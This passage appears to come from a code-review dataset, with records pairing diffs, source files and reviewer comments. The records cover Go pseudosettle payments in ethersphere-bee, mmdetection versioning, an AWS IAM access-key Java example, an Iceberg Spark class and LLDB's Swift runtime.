return err } var lastTime lastPayment err = s.store.Get(totalKey(p.Address, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return err } lastTime.Total = big.NewInt(0) } lastTime.Total = lastTime.Total.Add(lastTime.Total, paymentAmount) lastTime.Timestamp = timestamp err = s.store.Put(totalKey(p.Address, SettlementReceivedPrefix), lastTime) if err != nil { return err } receivedPaymentF64, _ := big.NewFloat(0).SetInt(paymentAmount).Float64() 
s.metrics.TotalReceivedPseudoSettlements.Add(receivedPaymentF64) s.metrics.ReceivedPseudoSettlements.Inc() return s.accounting.NotifyRefreshmentReceived(p.Address, paymentAmount) } // Pay initiates a payment to the given peer func (s *Service) Pay(ctx context.Context, peer swarm.Address, amount, checkAllowance *big.Int) (*big.Int, int64, error) { ctx, cancel := context.WithTimeout(ctx, 5*time.Second) defer cancel() var err error defer func() { if err != nil { s.metrics.ReceivedPseudoSettlementsErrors.Inc() } }() var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementSentPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, 0, err } lastTime.Total = big.NewInt(0) lastTime.Timestamp = 0 } currentTime := s.timeNow().Unix() if currentTime == lastTime.CheckTimestamp { return nil, 0, ErrSettlementTooSoon } stream, err := s.streamer.NewStream(ctx, peer, nil, protocolName, protocolVersion, streamName) if err != nil { return nil, 0, err } defer func() { if err != nil { _ = stream.Reset() } else { _ = stream.FullClose() } }() if checkAllowance.Cmp(amount) > 0 { checkAllowance.Set(amount) } s.logger.Tracef("pseudosettle sending payment message to peer %v of %d", peer, amount) w, r := protobuf.NewWriterAndReader(stream) err = w.WriteMsgWithContext(ctx, &pb.Payment{ Amount: amount.Bytes(), }) if err != nil { return nil, 0, err } checkTime := s.timeNow().Unix() var paymentAck pb.PaymentAck err = r.ReadMsgWithContext(ctx, &paymentAck) if err != nil { return nil, 0, err } acceptedAmount := new(big.Int).SetBytes(paymentAck.Amount) if acceptedAmount.Cmp(amount) > 0 { err = fmt.Errorf("pseudosettle peer %v accepted payment larger than expected", peer) return nil, 0, err } experiencedInterval := checkTime - lastTime.CheckTimestamp allegedInterval := paymentAck.Timestamp - lastTime.Timestamp if allegedInterval < 0 { return nil, 0, ErrTimeOutOfSync } experienceDifferenceRecent := paymentAck.Timestamp - checkTime if 
experienceDifferenceRecent < -2 || experienceDifferenceRecent > 2 { return nil, 0, ErrTimeOutOfSync } experienceDifferenceInterval := experiencedInterval - allegedInterval if experienceDifferenceInterval < -3 || experienceDifferenceInterval > 3 { return nil, 0, ErrTimeOutOfSync } // enforce allowance // check if value is appropriate expectedAllowance := new(big.Int).Mul(big.NewInt(allegedInterval), s.refreshRate) if expectedAllowance.Cmp(checkAllowance) > 0 { expectedAllowance = new(big.Int).Set(checkAllowance) } if expectedAllowance.Cmp(acceptedAmount) > 0 { // disconnect peer err = fmt.Errorf("pseudosettle peer %v accepted lower payment than expected", peer) return nil, 0, err } lastTime.Total = lastTime.Total.Add(lastTime.Total, acceptedAmount) lastTime.Timestamp = paymentAck.Timestamp lastTime.CheckTimestamp = checkTime err = s.store.Put(totalKey(peer, SettlementSentPrefix), lastTime) if err != nil { return nil, 0, err } amountFloat, _ := new(big.Float).SetInt(acceptedAmount).Float64() s.metrics.TotalSentPseudoSettlements.Add(amountFloat) s.metrics.SentPseudoSettlements.Inc() return acceptedAmount, lastTime.CheckTimestamp, nil } func (s *Service) SetAccounting(accounting settlement.Accounting) { s.accounting = accounting } // TotalSent returns the total amount sent to a peer func (s *Service) TotalSent(peer swarm.Address) (totalSent *big.Int, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementSentPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, settlement.ErrPeerNoSettlements } lastTime.Total = big.NewInt(0) } return lastTime.Total, nil } // TotalReceived returns the total amount received from a peer func (s *Service) TotalReceived(peer swarm.Address) (totalReceived *big.Int, err error) { var lastTime lastPayment err = s.store.Get(totalKey(peer, SettlementReceivedPrefix), &lastTime) if err != nil { if !errors.Is(err, storage.ErrNotFound) { return nil, settlement.ErrPeerNoSettlements } 
lastTime.Total = big.NewInt(0) } return lastTime.Total, nil } // SettlementsSent returns all stored sent settlement values for a given type of prefix func (s *Service) SettlementsSent() (map[string]*big.Int, error) { sent := make(map[string]*big.Int) err := s.store.Iterate(SettlementSentPrefix, func(key, val []byte) (stop bool, err error) { addr, err := totalKeyPeer(key, SettlementSentPrefix) if err != nil { return false, fmt.Errorf("parse address from key: %s: %w", string(key), err) } if _, ok := sent[addr.String()]; !ok { var storevalue lastPayment err = s.store.Get(totalKey(addr, SettlementSentPrefix), &storevalue) if err != nil { return false, fmt.Errorf("get peer %s settlement balance: %w", addr.String(), err) } sent[addr.String()] = storevalue.Total } return false, nil }) if err != nil { return nil, err } return sent, nil } // SettlementsReceived returns all stored received settlement values for a given type of prefix func (s *Service) SettlementsReceived() (map[string]*big.Int, error) { received := make(map[string]*big.Int) err := s.store.Iterate(SettlementReceivedPrefix, func(key, val []byte) (stop bool, err error) { addr, err := totalKeyPeer(key, SettlementReceivedPrefix) if err != nil { return false, fmt.Errorf("parse address from key: %s: %w", string(key), err) } if _, ok := received[addr.String()]; !ok { var storevalue lastPayment err = s.store.Get(totalKey(addr, SettlementReceivedPrefix), &storevalue) if err != nil { return false, fmt.Errorf("get peer %s settlement balance: %w", addr.String(), err) } received[addr.String()] = storevalue.Total } return false, nil }) if err != nil { return nil, err } return received, nil }
1
15,937
I know that previously this check was here but @ralph-pichler replaced it with the `CheckTimestamp` field stating that checking against `Timestamp` was incorrect. @ralph-pichler can you elaborate?
ethersphere-bee
go
@@ -0,0 +1,19 @@ +# Copyright (c) Open-MMLab. All rights reserved. + +__version__ = '2.3.0rc0' +short_version = '2.3.0rc0' + + +def parse_version_info(version_str): + version_info = [] + for x in version_str.split('.'): + if x.isdigit(): + version_info.append(int(x)) + elif x.find('rc') != -1: + patch_version = x.split('rc') + version_info.append(int(patch_version[0])) + version_info.append(f'rc{patch_version[1]}') + return tuple(version_info) + + +version_info = parse_version_info(__version__)
1
1
20,926
`short_version = __version__`
open-mmlab-mmdetection
py
@@ -1,4 +1,4 @@ -//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (IAM) user.] +//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (AWS IAM) user.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM]
1
//snippet-sourcedescription:[UpdateAccessKey.java demonstrates how to update the status of an access key for an AWS Identity and Access Management (IAM) user.] //snippet-keyword:[AWS SDK for Java v2] //snippet-keyword:[Code Sample] //snippet-service:[AWS IAM] //snippet-sourcetype:[full-example] //snippet-sourcedate:[11/02/2020] //snippet-sourceauthor:[scmacdon-aws] /* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. SPDX-License-Identifier: Apache-2.0 */ package com.example.iam; // snippet-start:[iam.java2.update_access_key.import] import software.amazon.awssdk.services.iam.model.IamException; import software.amazon.awssdk.services.iam.model.StatusType; import software.amazon.awssdk.services.iam.model.UpdateAccessKeyRequest; import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.iam.IamClient; // snippet-end:[iam.java2.update_access_key.import] public class UpdateAccessKey { private static StatusType statusType; public static void main(String[] args) { final String USAGE = "\n" + "Usage:\n" + " UpdateAccessKey <username> <accessId> <status> \n\n" + "Where:\n" + " username - the name of the user whose key you want to update. \n\n" + " accessId - the access key ID of the secret access key you want to update. \n\n" + " status - the status you want to assign to the secret access key. 
\n\n" ; if (args.length != 3) { System.out.println(USAGE); System.exit(1); } // Read the command line arguments String username = args[0]; String accessId = args[1]; String status = args[2]; Region region = Region.AWS_GLOBAL; IamClient iam = IamClient.builder() .region(region) .build(); updateKey(iam, username, accessId, status); System.out.println("Done"); iam.close(); } // snippet-start:[iam.java2.update_access_key.main] public static void updateKey(IamClient iam, String username, String accessId, String status ) { try { if (status.toLowerCase().equalsIgnoreCase("active")) { statusType = StatusType.ACTIVE; } else if (status.toLowerCase().equalsIgnoreCase("inactive")) { statusType = StatusType.INACTIVE; } else { statusType = StatusType.UNKNOWN_TO_SDK_VERSION; } UpdateAccessKeyRequest request = UpdateAccessKeyRequest.builder() .accessKeyId(accessId) .userName(username) .status(statusType) .build(); iam.updateAccessKey(request); System.out.printf( "Successfully updated the status of access key %s to" + "status %s for user %s", accessId, status, username); } catch (IamException e) { System.err.println(e.awsErrorDetails().errorMessage()); System.exit(1); } } // snippet-end:[iam.java2.update_access_key.main] }
1
18,251
AWS Identity and Access Management (IAM)
awsdocs-aws-doc-sdk-examples
rb
@@ -19,11 +19,12 @@ package org.apache.iceberg.spark; +import java.io.Serializable; import org.apache.iceberg.StructLike; import org.apache.iceberg.types.Types; import org.apache.spark.sql.Row; -public class SparkStructLike implements StructLike { +public class SparkStructLike implements StructLike, Serializable { private final Types.StructType type; private Row wrapped;
1
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.iceberg.spark; import org.apache.iceberg.StructLike; import org.apache.iceberg.types.Types; import org.apache.spark.sql.Row; public class SparkStructLike implements StructLike { private final Types.StructType type; private Row wrapped; public SparkStructLike(Types.StructType type) { this.type = type; } public SparkStructLike wrap(Row row) { this.wrapped = row; return this; } @Override public int size() { return type.fields().size(); } @Override public <T> T get(int pos, Class<T> javaClass) { Types.NestedField field = type.fields().get(pos); return javaClass.cast(SparkValueConverter.convert(field.type(), wrapped.get(pos))); } @Override public <T> void set(int pos, T value) { throw new UnsupportedOperationException("Not implemented: set"); } }
1
24,168
Required for the SparkDataFile SerDe
apache-iceberg
java
@@ -2595,16 +2595,8 @@ bool SwiftLanguageRuntime::CouldHaveDynamicValue(ValueObject &in_value) { // Swift class instances are actually pointers, but base class instances // are inlined at offset 0 in the class data. If we just let base classes // be dynamic, it would cause an infinite recursion. So we would usually - // disable it - // But if the base class is a generic type we still need to bind it, and - // that is - // a good job for dynamic types to perform - if (in_value.IsBaseClass()) { - CompilerType base_type(in_value.GetCompilerType()); - if (SwiftASTContext::IsFullyRealized(base_type)) - return false; - } - return true; + // disable it. + return !in_value.IsBaseClass(); } return var_type.IsPossibleDynamicType(nullptr, false, false, true); }
1
//===-- SwiftLanguageRuntime.cpp --------------------------------*- C++ -*-===// // // This source file is part of the Swift.org open source project // // Copyright (c) 2014 - 2018 Apple Inc. and the Swift project authors // Licensed under Apache License v2.0 with Runtime Library Exception // // See https://swift.org/LICENSE.txt for license information // See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors // //===----------------------------------------------------------------------===// #include "lldb/Target/SwiftLanguageRuntime.h" #include <string.h> #include "llvm/Support/raw_ostream.h" #include "clang/AST/ASTContext.h" #include "clang/AST/DeclCXX.h" #include "swift/ABI/System.h" #include "swift/AST/ASTContext.h" #include "swift/AST/ASTMangler.h" #include "swift/AST/Decl.h" #include "swift/AST/ExistentialLayout.h" #include "swift/AST/Module.h" #include "swift/AST/Types.h" #include "swift/AST/ASTWalker.h" #include "swift/Basic/SourceLoc.h" #include "swift/Demangling/Demangle.h" #include "swift/Demangling/Demangler.h" #include "swift/Reflection/ReflectionContext.h" #include "swift/Reflection/TypeRefBuilder.h" #include "swift/Remote/MemoryReader.h" #include "swift/Remote/RemoteAddress.h" #include "swift/RemoteAST/RemoteAST.h" #include "swift/Runtime/Metadata.h" #include "lldb/Breakpoint/StoppointCallbackContext.h" #include "lldb/Core/Debugger.h" #include "lldb/Core/Mangled.h" #include "lldb/Core/Module.h" #include "lldb/Core/PluginManager.h" #include "lldb/Core/Section.h" #include "lldb/Core/UniqueCStringMap.h" #include "lldb/Core/Value.h" #include "lldb/Core/ValueObjectConstResult.h" #include "lldb/DataFormatters/StringPrinter.h" #include "lldb/DataFormatters/TypeSynthetic.h" #include "lldb/DataFormatters/ValueObjectPrinter.h" #include "lldb/Host/HostInfo.h" #include "lldb/Host/OptionParser.h" #include "lldb/Interpreter/CommandInterpreter.h" #include "lldb/Interpreter/CommandObject.h" #include "lldb/Interpreter/CommandObjectMultiword.h" 
#include "lldb/Interpreter/CommandReturnObject.h" #include "lldb/Interpreter/OptionValueBoolean.h" #include "lldb/Symbol/ClangASTContext.h" #include "lldb/Symbol/CompileUnit.h" #include "lldb/Symbol/ObjectFile.h" #include "lldb/Symbol/SwiftASTContext.h" #include "lldb/Symbol/Symbol.h" #include "lldb/Symbol/TypeList.h" #include "lldb/Symbol/VariableList.h" #include "lldb/Target/ExecutionContext.h" #include "lldb/Target/ProcessStructReader.h" #include "lldb/Target/RegisterContext.h" #include "lldb/Target/StackFrame.h" #include "lldb/Target/Target.h" #include "lldb/Target/ThreadPlanRunToAddress.h" #include "lldb/Target/ThreadPlanStepInRange.h" #include "lldb/Target/ThreadPlanStepOverRange.h" #include "lldb/Utility/Status.h" #include "lldb/Utility/CleanUp.h" #include "lldb/Utility/DataBuffer.h" #include "lldb/Utility/LLDBAssert.h" #include "lldb/Utility/Log.h" #include "lldb/Utility/StringLexer.h" // FIXME: we should not need this #include "Plugins/Language/Swift/SwiftFormatters.h" using namespace lldb; using namespace lldb_private; char SwiftLanguageRuntime::ID = 0; static constexpr std::chrono::seconds g_po_function_timeout(15); static const char *g_dollar_tau_underscore = u8"$\u03C4_"; static ConstString g_self = ConstString("self"); extern "C" unsigned long long _swift_classIsSwiftMask = 0; namespace lldb_private { swift::Type GetSwiftType(void *opaque_ptr) { return reinterpret_cast<swift::TypeBase *>(opaque_ptr); } swift::CanType GetCanonicalSwiftType(void *opaque_ptr) { return reinterpret_cast<swift::TypeBase *>(opaque_ptr)->getCanonicalType(); } swift::CanType GetCanonicalSwiftType(const CompilerType &type) { return GetCanonicalSwiftType( reinterpret_cast<void *>(type.GetOpaqueQualType())); } swift::Type GetSwiftType(const CompilerType &type) { return GetSwiftType(reinterpret_cast<void *>(type.GetOpaqueQualType())); } } // namespace lldb_private SwiftLanguageRuntime::~SwiftLanguageRuntime() = default; static bool HasReflectionInfo(ObjectFile *obj_file) { auto 
findSectionInObject = [&](std::string name) { ConstString section_name(name); SectionSP section_sp = obj_file->GetSectionList()->FindSectionByName(section_name); if (section_sp) return true; return false; }; bool hasReflectionSection = false; hasReflectionSection |= findSectionInObject("__swift5_fieldmd"); hasReflectionSection |= findSectionInObject("__swift5_assocty"); hasReflectionSection |= findSectionInObject("__swift5_builtin"); hasReflectionSection |= findSectionInObject("__swift5_capture"); hasReflectionSection |= findSectionInObject("__swift5_typeref"); hasReflectionSection |= findSectionInObject("__swift5_reflstr"); return hasReflectionSection; } void SwiftLanguageRuntime::SetupReflection() { reflection_ctx.reset(new NativeReflectionContext(this->GetMemoryReader())); auto &target = m_process->GetTarget(); auto M = target.GetExecutableModule(); if (!M) return; auto *obj_file = M->GetObjectFile(); if (!obj_file) return; if (obj_file->GetPluginName().GetStringRef().equals("elf")) return; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>(start_address.GetLoadAddress(&target)); // Bail out if we can't read the executable instead of crashing. 
if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return; reflection_ctx.reset(new NativeReflectionContext(this->GetMemoryReader())); reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); auto module_list = GetTargetRef().GetImages(); module_list.ForEach([&](const ModuleSP &module_sp) -> bool { auto *obj_file = module_sp->GetObjectFile(); if (!obj_file) return false; if (obj_file->GetPluginName().GetStringRef().equals("elf")) return true; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>( start_address.GetLoadAddress(&(m_process->GetTarget()))); if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return false; if (HasReflectionInfo(obj_file)) reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); return true; }); } SwiftLanguageRuntime::SwiftLanguageRuntime(Process *process) : LanguageRuntime(process) { SetupSwiftError(); SetupExclusivity(); SetupReflection(); SetupABIBit(); } bool SwiftLanguageRuntime::IsABIStable() { return _swift_classIsSwiftMask == 2; } static llvm::Optional<lldb::addr_t> FindSymbolForSwiftObject(Target &target, ConstString object, const SymbolType sym_type) { llvm::Optional<lldb::addr_t> retval; SymbolContextList sc_list; if (target.GetImages().FindSymbolsWithNameAndType(object, sym_type, sc_list)) { SymbolContext SwiftObject_Class; if (sc_list.GetSize() == 1 && sc_list.GetContextAtIndex(0, SwiftObject_Class)) { if (SwiftObject_Class.symbol) { lldb::addr_t SwiftObject_class_addr = SwiftObject_Class.symbol->GetAddress().GetLoadAddress(&target); if (SwiftObject_class_addr && SwiftObject_class_addr != LLDB_INVALID_ADDRESS) retval = SwiftObject_class_addr; } } } return retval; } AppleObjCRuntimeV2 *SwiftLanguageRuntime::GetObjCRuntime() { if (auto objc_runtime = ObjCLanguageRuntime::Get(*GetProcess())) { if (objc_runtime->GetPluginName() == AppleObjCRuntimeV2::GetPluginNameStatic()) return (AppleObjCRuntimeV2 *)objc_runtime; } return nullptr; } void 
SwiftLanguageRuntime::SetupSwiftError() { Target &target(m_process->GetTarget()); if (m_SwiftNativeNSErrorISA.hasValue()) return; ConstString g_SwiftNativeNSError("__SwiftNativeNSError"); m_SwiftNativeNSErrorISA = FindSymbolForSwiftObject( target, g_SwiftNativeNSError, eSymbolTypeObjCClass); } void SwiftLanguageRuntime::SetupExclusivity() { Target &target(m_process->GetTarget()); ConstString g_disableExclusivityChecking("_swift_disableExclusivityChecking"); m_dynamic_exclusivity_flag_addr = FindSymbolForSwiftObject( target, g_disableExclusivityChecking, eSymbolTypeData); Log *log(GetLogIfAnyCategoriesSet(LIBLLDB_LOG_EXPRESSIONS)); if (log) log->Printf("SwiftLanguageRuntime: _swift_disableExclusivityChecking = %lu", m_dynamic_exclusivity_flag_addr ? *m_dynamic_exclusivity_flag_addr : 0); } void SwiftLanguageRuntime::SetupABIBit() { Target &target(m_process->GetTarget()); ConstString g_objc_debug_swift_stable_abi_bit("objc_debug_swift_stable_abi_bit"); if (FindSymbolForSwiftObject(target, g_objc_debug_swift_stable_abi_bit, eSymbolTypeAny)) _swift_classIsSwiftMask = 2; else _swift_classIsSwiftMask = 1; } void SwiftLanguageRuntime::ModulesDidLoad(const ModuleList &module_list) { module_list.ForEach([&](const ModuleSP &module_sp) -> bool { auto *obj_file = module_sp->GetObjectFile(); if (!obj_file) return true; Address start_address = obj_file->GetBaseAddress(); auto load_ptr = static_cast<uintptr_t>( start_address.GetLoadAddress(&(m_process->GetTarget()))); if (load_ptr == 0 || load_ptr == LLDB_INVALID_ADDRESS) return false; if (!reflection_ctx) return false; if (HasReflectionInfo(obj_file)) reflection_ctx->addImage(swift::remote::RemoteAddress(load_ptr)); return true; }); } static bool GetObjectDescription_ResultVariable(Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(%s)", object.GetName().GetCString()); if 
(log) log->Printf("[GetObjectDescription_ResultVariable] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf("[GetObjectDescription_ResultVariable] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionSetupError"); break; case eExpressionParseError: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf("[GetObjectDescription_ResultVariable] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ResultVariable] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ResultVariable] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "no result"); return false; } if (result_sp->GetError().Fail()) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "error: %s", result_sp->GetError().AsCString()); return false; } if (false == 
result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "invalid type"); return false; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression completed " "successfully"); return true; } else { if (log) log->Printf("[GetObjectDescription_ResultVariable] expression generated " "invalid string data"); return false; } } static bool GetObjectDescription_ObjectReference(Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(Swift." 
"unsafeBitCast(0x%" PRIx64 ", to: AnyObject.self))", object.GetValueAsUnsigned(0)); if (log) log->Printf("[GetObjectDescription_ObjectReference] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionSetupError"); break; case eExpressionParseError: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ObjectReference] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf("[GetObjectDescription_ObjectReference] " "eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ObjectReference] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "no result"); return false; } if (result_sp->GetError().Fail()) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression 
generated " "error: %s", result_sp->GetError().AsCString()); return false; } if (false == result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "invalid type"); return false; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression completed " "successfully"); return true; } else { if (log) log->Printf("[GetObjectDescription_ObjectReference] expression generated " "invalid string data"); return false; } } static const ExecutionContextRef *GetSwiftExeCtx(ValueObject &valobj) { return (valobj.GetPreferredDisplayLanguage() == eLanguageTypeSwift) ? &valobj.GetExecutionContextRef() : nullptr; } static bool GetObjectDescription_ObjectCopy(SwiftLanguageRuntime *runtime, Process *process, Stream &str, ValueObject &object) { Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_DATAFORMATTERS)); ValueObjectSP static_sp(object.GetStaticValue()); CompilerType static_type(static_sp->GetCompilerType()); if (auto non_reference_type = static_type.GetNonReferenceType()) static_type = non_reference_type; Status error; // If we are in a generic context, here the static type of the object // might end up being generic (i.e. <T>). We want to make sure that // we correctly map the type into context before asking questions or // printing, as IRGen requires a fully realized type to work on. 
auto frame_sp = process->GetThreadList().GetSelectedThread()->GetSelectedFrame(); auto *swift_ast_ctx = llvm::dyn_cast_or_null<SwiftASTContext>(static_type.GetTypeSystem()); if (swift_ast_ctx) { SwiftASTContextLock lock(GetSwiftExeCtx(object)); static_type = runtime->DoArchetypeBindingForType(*frame_sp, static_type); } auto stride = 0; auto opt_stride = static_type.GetByteStride(frame_sp.get()); if (opt_stride) stride = *opt_stride; lldb::addr_t copy_location = process->AllocateMemory( stride, ePermissionsReadable | ePermissionsWritable, error); if (copy_location == LLDB_INVALID_ADDRESS) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] copy_location invalid"); return false; } CleanUp cleanup( [process, copy_location] { process->DeallocateMemory(copy_location); }); DataExtractor data_extractor; if (0 == static_sp->GetData(data_extractor, error)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] data extraction failed"); return false; } if (0 == process->WriteMemory(copy_location, data_extractor.GetDataStart(), data_extractor.GetByteSize(), error)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] memory copy failed"); return false; } StreamString expr_string; expr_string.Printf("Swift._DebuggerSupport.stringForPrintObject(Swift." 
"UnsafePointer<%s>(bitPattern: 0x%" PRIx64 ")!.pointee)", static_type.GetTypeName().GetCString(), copy_location); if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression: %s", expr_string.GetData()); ValueObjectSP result_sp; EvaluateExpressionOptions eval_options; eval_options.SetLanguage(lldb::eLanguageTypeSwift); eval_options.SetResultIsInternal(true); eval_options.SetGenerateDebugInfo(true); eval_options.SetTimeout(g_po_function_timeout); auto eval_result = process->GetTarget().EvaluateExpression( expr_string.GetData(), process->GetThreadList().GetSelectedThread()->GetSelectedFrame().get(), result_sp, eval_options); if (log) { switch (eval_result) { case eExpressionCompleted: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionCompleted"); break; case eExpressionSetupError: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionSetupError"); break; case eExpressionParseError: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionParseError"); break; case eExpressionDiscarded: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionDiscarded"); break; case eExpressionInterrupted: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionInterrupted"); break; case eExpressionHitBreakpoint: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionHitBreakpoint"); break; case eExpressionTimedOut: log->Printf("[GetObjectDescription_ObjectCopy] eExpressionTimedOut"); break; case eExpressionResultUnavailable: log->Printf( "[GetObjectDescription_ObjectCopy] eExpressionResultUnavailable"); break; case eExpressionStoppedForDebug: log->Printf( "[GetObjectDescription_ObjectCopy] eExpressionStoppedForDebug"); break; } } // sanitize the result of the expression before moving forward if (!result_sp) { if (log) log->Printf( "[GetObjectDescription_ObjectCopy] expression generated no result"); str.Printf("expression produced no result"); return true; } if (result_sp->GetError().Fail()) { if (log) log->Printf( "[GetObjectDescription_ObjectCopy] 
expression generated error: %s", result_sp->GetError().AsCString()); str.Printf("expression produced error: %s", result_sp->GetError().AsCString()); return true; } if (false == result_sp->GetCompilerType().IsValid()) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression generated " "invalid type"); str.Printf("expression produced invalid result type"); return true; } lldb_private::formatters::StringPrinter::ReadStringAndDumpToStreamOptions dump_options; dump_options.SetEscapeNonPrintables(false).SetQuote('\0').SetPrefixToken( nullptr); if (lldb_private::formatters::swift::String_SummaryProvider( *result_sp.get(), str, TypeSummaryOptions() .SetLanguage(lldb::eLanguageTypeSwift) .SetCapping(eTypeSummaryUncapped), dump_options)) { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression completed " "successfully"); } else { if (log) log->Printf("[GetObjectDescription_ObjectCopy] expression generated " "invalid string data"); str.Printf("expression produced unprintable string"); } return true; } static bool IsSwiftResultVariable(ConstString name) { if (name) { llvm::StringRef name_sr(name.GetStringRef()); if (name_sr.size() > 2 && (name_sr.startswith("$R") || name_sr.startswith("$E")) && ::isdigit(name_sr[2])) return true; } return false; } static bool IsSwiftReferenceType(ValueObject &object) { CompilerType object_type(object.GetCompilerType()); if (llvm::dyn_cast_or_null<SwiftASTContext>(object_type.GetTypeSystem())) { Flags type_flags(object_type.GetTypeInfo()); if (type_flags.AllSet(eTypeIsClass | eTypeHasValue | eTypeInstanceIsPointer)) return true; } return false; } bool SwiftLanguageRuntime::GetObjectDescription(Stream &str, ValueObject 